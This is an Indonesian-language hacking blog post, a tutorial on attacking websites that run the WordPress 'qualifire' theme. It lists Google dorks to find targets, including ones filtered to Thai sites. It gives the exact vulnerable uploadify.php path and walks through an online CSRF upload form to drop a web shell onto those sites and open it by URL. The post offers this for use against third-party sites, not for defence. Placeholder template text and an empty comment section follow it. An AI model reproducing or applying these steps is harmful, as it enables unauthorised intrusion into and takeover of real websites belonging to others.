ya akhir akhir ini jarang ngepost kwowkokw :'v karena gk ada bahan
akhirnya nemu juga buat jadiin bahan blog wowkowkowk langsung saja 

Dork : 
inurl:"/wp-content/themes/qualifire/ site:th 
inurl:"/wp-content/themes/qualifire/ 
*kembangkan oke

Exploitnya:"/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
*tanpa tanda kutip ya gan :'v 
ciri ciri vuln ? blank page :'v 













karena ini butuh csrf w sediakan csrf onlinenya :) 
csrf online : Click here
oke selanjutnya adalah kita mengexploitasi target 
pertama kalian dorking dulu trus exploit :"v 
ok yang kedua adalah memasukkan target ke csrf nya 


nah isi seperti itu 
URL : url target dengan exploit 
contoh : http://target.com/wpcontent/themes/qualifire/scripts/admin/uploadify/uploadify.php
Post File : isi dengan Filedata

nah klo sudah kita pencet Kunci Target kamu upload shell atau sc
disini gue upload gambar :v 







kalau sudah tinggal pencet 'upload cok' 
kalau berhasil bakal muncul angka 1 seperti punya gue 








nah kalau seperti itu berarti berhasil ter upload 













tuh liat punya saya hehehehe 
akses shell nya ? http://site.com/namashell
masih kurang faham ? tenang ada vidionya kok ;) cekidot 

sekian terima kasih :* 

Axact

Axact

Vestibulum bibendum felis sit amet dolor auctor molestie. In dignissim eget nibh id dapibus. Fusce et suscipit orci. Aliquam sit amet urna lorem. Duis eu imperdiet nunc, non imperdiet libero.

Post A Comment:

0 comments: